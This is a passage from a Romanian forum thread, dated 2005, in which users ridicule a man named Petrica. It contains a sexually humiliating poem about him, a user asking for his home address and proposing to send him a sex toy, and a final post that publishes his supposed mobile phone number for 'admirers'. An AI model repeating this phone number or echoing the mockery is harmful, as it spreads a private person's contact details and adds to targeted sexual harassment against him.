Nu te supara ca o ai mica...

Mama ta cand o vedea...

Tot asa te alinta:

Petrica nu fii trist...

Poate o sa-ajungi artist....

VA URMA

Pisoi
28.10.2005, 07:52
yankee, e tare clasamentul si "educativ" ...petrica ne-a parasit, cred ca s-ar fi bucurat sa afle ca se mai pot da si alte intelesuri cuvintelor din vocabularul lui limitat...

vlad, ai mai aflat cate ceva despre "personajul" nostru? ...poate adresa, ca de asta se temea... ma gandeam sa-i trimitem o jucarie, in caz ca a lui se srtica de atata folosinta...

melina, actiunea ghost/goat s-a petrecut la Grupul Scolar "Unirea" (Pascani) ...asa-i? ...profesorul din Texas a vizitat scoala lui pertica.

28.10.2005, 09:54
melina, actiunea ghost/goat s-a petrecut la Grupul Scolar "Unirea" (Pascani) ...asa-i? ...profesorul din Texas a vizitat scoala lui pertica.

Asa este pisoiule,o sa adaug acuma!smileys/smiley2.gif

gatasmileys/smiley36.gif

mynike2007
11.11.2005, 11:41
Telefonul lui Petrica, pentru ,,admiratoare":

0721459659</font>